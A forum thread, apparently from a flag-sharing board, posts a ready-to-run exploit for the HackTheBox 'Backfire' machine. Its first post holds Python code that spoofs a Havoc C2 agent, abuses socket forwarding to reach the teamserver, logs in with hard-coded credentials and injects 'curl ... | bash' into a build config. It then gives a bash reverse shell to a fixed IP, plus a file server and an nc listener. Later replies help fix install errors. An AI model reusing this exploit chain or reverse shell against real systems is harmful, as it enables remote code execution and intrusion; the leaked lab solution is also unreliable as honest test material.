HTB Backfire user flag
by terk12 - Sunday January 19, 2025 at 11:49 AM
#1
Script
import os import json import hashlib import binascii import random import requests import argparse import urllib3 from Crypto.Cipher import AES from Crypto.Util import Counter urllib3.disable_warnings() key_bytes = 32 def decrypt(key, iv, ciphertext): if len(key) <= key_bytes: for _ in range(len(key), key_bytes): key += b"0" assert len(key) == key_bytes iv_int = int(binascii.hexlify(iv), 16) ctr = Counter.new(AES.block_size * 8, initial_value=iv_int) aes = AES.new(key, AES.MODE_CTR, counter=ctr) plaintext = aes.decrypt(ciphertext) return plaintext def int_to_bytes(value, length=4, byteorder="big"): return value.to_bytes(length, byteorder) def encrypt(key, iv, plaintext): if len(key) <= key_bytes: for x in range(len(key), key_bytes): key = key + b"0" assert len(key) == key_bytes iv_int = int(binascii.hexlify(iv), 16) ctr = Counter.new(AES.block_size * 8, initial_value=iv_int) aes = AES.new(key, AES.MODE_CTR, counter=ctr) ciphertext = aes.encrypt(plaintext) return ciphertext def register_agent(hostname, username, domain_name, internal_ip, process_name, process_id): command = b"\x00\x00\x00\x63" request_id = b"\x00\x00\x00\x01" demon_id = agent_id hostname_length = int_to_bytes(len(hostname)) username_length = int_to_bytes(len(username)) domain_name_length = int_to_bytes(len(domain_name)) internal_ip_length = int_to_bytes(len(internal_ip)) process_name_length = int_to_bytes(len(process_name) - 6) data = b"\xab" * 100 header_data = command + request_id + AES_Key + AES_IV + demon_id + hostname_length + hostname + username_length + username + domain_name_length + domain_name + internal_ip_length + internal_ip + process_name_length + process_name + process_id + data size = 12 + len(header_data) size_bytes = size.to_bytes(4, 'big') agent_header = size_bytes + magic + agent_id print(agent_header + header_data) print("[***] Trying to register agent...") r = requests.post(teamserver_listener_url, data=agent_header + header_data, headers=headers, verify=False) if r.status_code == 200: print("[***] Success!") else: print(f"[!!!] Failed to register agent - {r.status_code} {r.text}") def open_socket(socket_id, target_address, target_port): command = b"\x00\x00\x09\xec" request_id = b"\x00\x00\x00\x02" subcommand = b"\x00\x00\x00\x10" sub_request_id = b"\x00\x00\x00\x03" local_addr = b"\x22\x22\x22\x22" local_port = b"\x33\x33\x33\x33" forward_addr = b"" for octet in target_address.split(".")[::-1]: forward_addr += int_to_bytes(int(octet), length=1) forward_port = int_to_bytes(target_port) package = subcommand + socket_id + local_addr + local_port + forward_addr + forward_port package_size = int_to_bytes(len(package) + 4) header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package) size = 12 + len(header_data) size_bytes = size.to_bytes(4, 'big') agent_header = size_bytes + magic + agent_id data = agent_header + header_data print("[***] Trying to open socket on the teamserver...") r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False) if r.status_code == 200: print("[***] Success!") else: print(f"[!!!] Failed to open socket on teamserver - {r.status_code} {r.text}") def write_socket(socket_id, data): command = b"\x00\x00\x09\xec" request_id = b"\x00\x00\x00\x08" subcommand = b"\x00\x00\x00\x11" sub_request_id = b"\x00\x00\x00\xa1" socket_type = b"\x00\x00\x00\x03" success = b"\x00\x00\x00\x01" data_length = int_to_bytes(len(data)) package = subcommand + socket_id + socket_type + success + data_length + data package_size = int_to_bytes(len(package) + 4) header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package) size = 12 + len(header_data) size_bytes = size.to_bytes(4, 'big') agent_header = size_bytes + magic + agent_id post_data = agent_header + header_data print(post_data) print("[***] Trying to write to the socket") r = requests.post(teamserver_listener_url, data=post_data, headers=headers, verify=False) if r.status_code == 200: print("[***] Success!") else: print(f"[!!!] Failed to write data to the socket - {r.status_code} {r.text}") def read_socket(socket_id): command = b"\x00\x00\x00\x01" request_id = b"\x00\x00\x00\x09" header_data = command + request_id size = 12 + len(header_data) size_bytes = size.to_bytes(4, 'big') agent_header = size_bytes + magic + agent_id data = agent_header + header_data print("[***] Trying to poll teamserver for socket output...") r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False) if r.status_code == 200: print("[***] Read socket output successfully!") else: print(f"[!!!] Failed to read socket output - {r.status_code} {r.text}") return "" command_id = int.from_bytes(r.content[0:4], "little") request_id = int.from_bytes(r.content[4:8], "little") package_size = int.from_bytes(r.content[8:12], "little") enc_package = r.content[12:] return decrypt(AES_Key, AES_IV, enc_package)[12:] def create_websocket_request(host, port): request = ( f"GET /havoc/ HTTP/1.1\r\n" f"Host: {host}:{port}\r\n" f"Upgrade: websocket\r\n" f"Connection: Upgrade\r\n" f"Sec-WebSocket-Key: 5NUvQyzkv9bpu376gKd2Lg==\r\n" f"Sec-WebSocket-Version: 13\r\n" f"\r\n" ).encode() return request def build_websocket_frame(payload): payload_bytes = payload.encode("utf-8") frame = bytearray() frame.append(0x81) payload_length = len(payload_bytes) if payload_length <= 125: frame.append(0x80 | payload_length) elif payload_length <= 65535: frame.append(0x80 | 126) frame.extend(payload_length.to_bytes(2, byteorder="big")) else: frame.append(0x80 | 127) frame.extend(payload_length.to_bytes(8, byteorder="big")) masking_key = os.urandom(4) frame.extend(masking_key) masked_payload = bytearray(byte ^ masking_key[i % 4] for i, byte in enumerate(payload_bytes)) frame.extend(masked_payload) return frame parser = argparse.ArgumentParser() parser.add_argument("-t", "--target", help="The listener target in URL format", required=True) parser.add_argument("-i", "--ip", help="The IP to open the socket with", required=True) parser.add_argument("-p", "--port", help="The port to open the socket with", required=True) parser.add_argument("-A", "--user-agent", help="The User-Agent for the spoofed agent", default="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36") parser.add_argument("-H", "--hostname", help="The hostname for the spoofed agent", default="DESKTOP-7F61JT1") parser.add_argument("-u", "--username", help="The username for the spoofed agent", default="Administrator") parser.add_argument("-d", "--domain-name", help="The domain name for the spoofed agent", default="ECORP") parser.add_argument("-n", "--process-name", help="The process name for the spoofed agent", default="msedge.exe") parser.add_argument("-ip", "--internal-ip", help="The internal ip for the spoofed agent", default="10.1.33.7") args = parser.parse_args() magic = b"\xde\xad\xbe\xef" teamserver_listener_url = args.target headers = { "User-Agent": args.user_agent } agent_id = int_to_bytes(random.randint(100000, 1000000)) AES_Key = b"\x00" * 32 AES_IV = b"\x00" * 16 hostname = bytes(args.hostname, encoding="utf-8") username = bytes(args.username, encoding="utf-8") domain_name = bytes(args.domain_name, encoding="utf-8") internal_ip = bytes(args.internal_ip, encoding="utf-8") process_name = args.process_name.encode("utf-16le") process_id = int_to_bytes(random.randint(1000, 5000)) register_agent(hostname, username, domain_name, internal_ip, process_name, process_id) socket_id = b"\x11\x11\x11\x11" open_socket(socket_id, args.ip, int(args.port)) USER = "ilya" PASSWORD = "CobaltStr1keSuckz!" host = "127.0.0.1" port = 40056 websocket_request = create_websocket_request(host, port) write_socket(socket_id, websocket_request) response = read_socket(socket_id) payload = {"Body": {"Info": {"Password": hashlib.sha3_256(PASSWORD.encode()).hexdigest(), "User": USER}, "SubEvent": 3}, "Head": {"Event": 1, "OneTime": "", "Time": "18:40:17", "User": USER}} payload_json = json.dumps(payload) frame = build_websocket_frame(payload_json) write_socket(socket_id, frame) response = read_socket(socket_id) payload = {"Body":{"Info": {"Headers":"","HostBind":"0.0.0.0","HostHeader":"","HostRotation":"round robin","Hosts":"0.0.0.0","Name":"abc","PortBind":"443","PortConn":"443","P rotocol":"Https","Proxy Enabled":"false","Secure":"true","Status":"online","Uris":"","UserAgent":" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"},"SubEvent":1},"Head": {"Event":2,"OneTime":"","Time":"08:39:18","User": USER}} payload_json = json.dumps(payload) frame = build_websocket_frame(payload_json) write_socket(socket_id, frame) response = read_socket(socket_id) # CHANGE THIS LINE TO YOUR IP WHERE YOUR HOSTING YOUR PYTHON SERVER cmd = "curl http://10.10.14.47:8000/payload.sh | bash" injection = """ \\\\\\\" -mbla; """ + cmd + """ 1>&2 && false #""" payload = {"Body": {"Info": {"AgentType": "Demon", "Arch": "x64", "Config": "{\n    \"Amsi/Etw Patch\": \"None\",\n    \"Indirect Syscall\": false,\n    \"Injection\": {\n        \"Alloc\": \"Native/Syscall\",\n      \"Execute\": \"Native/Syscall\",\n        \"Spawn32\": \"C:\\\\Windows\\\\SysWOW64\\\\notepad.exe\",\n        \"Spawn64\": \"C:\\\\Windows\\\\System32\\\\notepad.exe\"\n    },\n    \"Jitter\": \"0\",\n    \"Proxy Loading\": \"None (LdrLoadDll)\",\n    \"Service Name\":\"" + injection + "\",\n    \"Sleep\": \"2\",\n    \"Sleep Jmp Gadget\": \"None\",\n    \"Sleep Technique\": \"WaitForSingleObjectEx\",\n  \"Stack Duplication\": false\n}\n", "Format": "Windows Service Exe", "Listener": "abc"}, "SubEvent": 2}, "Head": { "Event": 5, "OneTime": "true", "Time": "18:39:04", "User": USER}} payload_json = json.dumps(payload) frame = build_websocket_frame(payload_json) write_socket(socket_id, frame) response = read_socket(socket_id)

after that create a payload.sh 

#!/bin/bash
bash -i >& /dev/tcp/10.10.11.65/4444 0>&1 

create a python server

```python3 -m http.server 8000```

next listener 

```nc -lvnp 4444```

then run the script 

```python3 script.py --target https://10.10.11.49 -i 127.0.0.1 -p 40056```
Reply
#2
I have problem to install crypto module for python3, i do not understand why. PLS help.
Reply
#3
(01-19-2025, 11:15 PM)monkeyNo1 Wrote: I have problem to install crypto module for python3, i do not understand why. PLS help.

 virtualenv venv

 source venv/bin/activate

 pip3 install pycryptodome                                        
Reply
#4
(01-19-2025, 11:15 PM)monkeyNo1 Wrote: I have problem to install crypto module for python3, i do not understand why. PLS help.
Install Cryptodome. symbolic link is required within '/usr/lib/python3/dist-packages/' to redirect from Cryptodome to Crypto
Reply
#5
Python giving errors everytime
Reply
#6
(01-20-2025, 05:21 AM)0mniscient Wrote: Python giving errors everytime

if you just copy-pasted the code, you will need to go in and clean up the syntax properly each python error should tell you where the problem lies, if the code is spitting out tons of errors like it runs the whole process and constantly errors, change your target to https://{TARGET}
Reply
#7
Still working on that part. I've got the instructions from "https://raidforums.su/Thread-Backfire-user-part-writeup-and-rough-root" but for the rough root im still working on wrapping my head around the process they list
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 92,218 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 5,263 03-28-2026, 03:30 AM
Last Post: lulaladrow
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 10,501 03-27-2026, 07:22 PM
Last Post: stn
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 3,236 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 3,520 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: 1 Guest(s)